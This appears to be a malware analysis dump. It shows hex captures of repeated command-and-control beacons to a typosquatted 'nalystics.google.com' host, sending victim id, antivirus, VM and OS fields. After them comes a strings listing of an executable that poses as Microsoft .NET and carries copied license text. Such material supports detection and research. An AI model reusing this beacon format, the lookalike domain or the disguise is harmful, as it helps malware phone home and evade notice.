hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6a 752f6647 7a645468 4d492048 abjju/fGzdThMI H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6b 2b535a4e 4d74494f 49682048 abjk+SZNMtIOIh H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a6a 41776447 32755455 6f772048 abjjAwdG2uTUow H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a73 4275356a 2b516470 636a2048 abjsBu5j+Qdpcj H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d31 31373726 XX0000&key=1177& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d313333 266f733d 352e312e 32363030 =133&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796731 53443136 506f6a7a 76335056 Wyg1SD16Pojzv3PV 0x000000b0 (00176) 37586759 3264576c 50343573 3756326a 7XgY2dWlP45s7V2j 0x000000c0 (00192) 61626a75 46485651 6f436442 75662048 abjuFHVQoCdBuf H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2061 TTP/1.1..Host: a 0x000000e0 (00224) 6e616c79 73746963 732e676f 6f676c65 nalystics.google 0x000000f0 (00240) 2e636f6d 0d0a0d0a .com....
Strings
edWP.rsrcVttceuritorla \ .CC . 040904B0 1s%P 2.0.50727.42 2.0.50727.42 (RTM.050727-4200) bsJP2 Comments CompanyName credui.dll &File FileDescription FileVersion Flavor=Retail H ((((( H H|1%i h&About ... &Help h(((( H iE&xit InternalName Js2P JSOPEN KERNEL32.DLL LegalCopyright MAINICON Microsoft Microsoft Corporation Microsoft Corporation. All rights reserved. Microsoft .NET viewer mscoree.dll MS Shell Dlg .NET Framework NETFXSBS10.exe OriginalFilename ProductName ProductVersion SCRIPTS ssPP StringFileInfo Translation {tw- VarFileInfo VS_VERSION_INFO =(@"[@ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 03_nuj 0A@@Ju :0^B$r 0/P4v4 0SSSSS 0xbkNE '11899AA@KI '11-899@@QGO #''(-12..91-00 1@6,aF ((1-823908QKFB 18A@k> $$(("-2... '-223 -'-23399 '2899AJA #''(((-3..... 30AAj_ :::3$x 4BRsju 4%Fkep .4sZL_3n6J 53 J@| 5BuyW| 5n]aaaa% 6~4e;~ \"}6;b 6>Mbbbbbb% 6=`qqqq4 6u^Mq% 6V"#c: 7~*67~# 7DaMMMMM% 7-#g3RMa?K 7^g[F8 7~nC7~ 7,OdddddeydNc% ,]845I^ '889JJJjx -'899AlG '8@AJJJP ;[8"=j '9AJjjj; '9AJjjjm '9AJkjjn 9M+,(w% 9t(g9o [%9z`' abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ An application has made an attempt to load the C runtime library incorrectly. apjH ? - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August A \z5C ,>bddd> BeginPaint Bigggggg Biiiiiii BoMbb% bTYE=S^Q bXb$Sg $ceepq cE(w6B cgego4 CloseHandle CorExitProcess >cQjL)M - CRT not initialized d}23 i @.data d%}.c!Lw dddd, MMMM dd, yyyy December DecodePointer DefWindowProcA DeleteCriticalSection DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. D{!J(4: DOMAIN error ,( DxwT &dyyyyy )-/+@EC+ eeegeeeeeeeeeey &Eggggggged elB%sJ EncodePointer EndPaint EnterCriticalSection erbhn$.> ExitProcess EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. +Eyyyyy% eyyyyyyeyyyyyyy F{3M<A fB{A!$J F_ddd% February fEeeeeeee - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue Fogci9y FreeEnvironmentStringsA FreeEnvironmentStringsW Friday .FrMt\ ]-#g3RMv GDrqq) GetACP GetActiveWindow GetCommandLineA GetCommandLineW GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessWindowStation GetStartupInfoA GetStdHandle GetStringTypeA GetStringTypeW GetSystemMetrics GetSystemTimeAsFileTime GetTickCount GetUserObjectInformationA GetVersion GF+v^:* ggggggggggggggg<n _gKhn"+ HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize HH:mm:ss 'Hl'I|L Hlum^^^^= HSQ}|{{tnUWUUWUUUUU= I}AWjX 3 iB4J*P i}b-jZ ~iFFI6 iiiiiiii Ijc88]#x InitializeCriticalSectionAndSpinCount ;INNNNNdNNd% InterlockedDecrement InterlockedIncrement IsDebuggerPresent IsValidCodePage `J8%} JanFebMarAprMayJunJulAugSepOctNovDec January '@@JJjj}f j@j ^V jKns4% jWy*tjq? kernel32.dll KERNEL32.dll KKKKKKKK< Kl_Jka@h5 K&{nC_ {kQ#}f Kqwy(dhqx *Ktuo]]]]= l2OUfmB LaElB,O Last modified: Mayc LCMapStringA LCMapStringW LeaveCriticalSection LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective LkGo9m L|{o^^= LoadLibraryA LoadLibraryW lstrcmpiA Lttm[]]]]4 LuuR^^^^= L}|v\]]= M4\9h%cjM8 ?Mccccccc% MessageBoxA Microsoft Visual C++ Runtime Library mK/HRM> mm____4 MM/dd/yy :_MMMMMb% mmpppp4 ;MNNNNNNNN% Monday moTUTTTTTTUUT= mQ1aPN mRpppp4 MultiByteToWideChar Mv!=r-I Njmvvm - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November ntdll.dll =nUFPla nX\\\\[= nYZYYYY[= o#6$;6@: `OBB|M October "O$D9d oftware). o)>IG4F ^)OKTIq :oqcbb% `OrA|M p___^^^^>]>]]>]>]>]>= p_bQl] ;pcNNdEI% P/EyVk8R Please contact the application's support team for more information. PPPPPPPP Program: <program name unknown> pUOs2rH - pure virtual function call pwju?]{o Q-ANeesL qohqA= :]qqqqq% QueryPerformanceCounter Q}|vU\\\\= ^qwf^hu `.rdata Rn````4 RR````4 RTaaaa4 RtlUnwind runtime error Runtime Error! RUXXWXXXXW= Rv|,(Q RVVVGGGFFF::CCC// RVVVGGGGFFFFF::::CCCC/////< R:wUlZIS RXYYXYXXX= R"(=zj r ^zPY s7~ls7~ Saturday sd>W8"= September SetHandleCount SetLastError SetUnhandledExceptionFilter ]Sgcz. !'/SHG ShowWindow SING error SIV )n =SOFTu SOFTWARE LICENSE AGREEMENT \s'R_8m strstr s|u]^= Sunday SunMonTueWedThuFriSat Svm____4 \t^]6: ;t99P/; TerminateProcess TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. This application has requested the Runtime to terminate it in an unusual way. This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday {T~Iqfb < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue tn]]]]\4 ~~to[\[\\\= t"SS9] ,TTTTonmvuttuvmnTTTTTTTTTTTTTTTT= t$<"u 3 Tuesday ;t$,v- tvnXXYY[ZZY= t+WWVPV U2>VQ? u$7X-t uBh~(@ <um^^^^= - unable to initialize heap - unable to open console device UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter u{)'NL UpdateWindow UQPXY]Y[ URPQQh0Y@ USER32.dll USER32.DLL ,[UTnv UUULl|l UUUTllv|g UUUUUUUUUP UUUUUUUUUUUUUUUUUUP UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUP uUUUUUUUW UUUUUUUUW uUUUUUUW UUUUUUUW UUUUUUW uUUUUUWwwwwwwwwwUUUU uUUUUW UUUUUW UUUUUWw uUUWwwwwUU {uX]]]= v0RI\n v[\\\\\4 ]V4WA<, v/^IdX: VirtualAlloc VirtualFree /vLxN.dS vm^___= vm1Mn'Y :VMcccc% v N+D$ V!NKWzC vQ}+t8 -W+]" Wednesday Wf`J[* WideCharToMultiByte wj<o5C WLMqgV WriteFile wUUUUUUUUUWwwwwwwwwwwwwwuUUUUU x@*0FO X7fo;< |[?XB]N xuUUUUUUUUW Yc,j] R Y<G6yQ yGp?jy YMz</[1 YO!\d$ >=Yt1j yyyyyy z1Rich !zA#=i z RP(OE zWnFc)- zz;=H8 |{zzzzzz{|tmoTTTTTTTTTTTTT=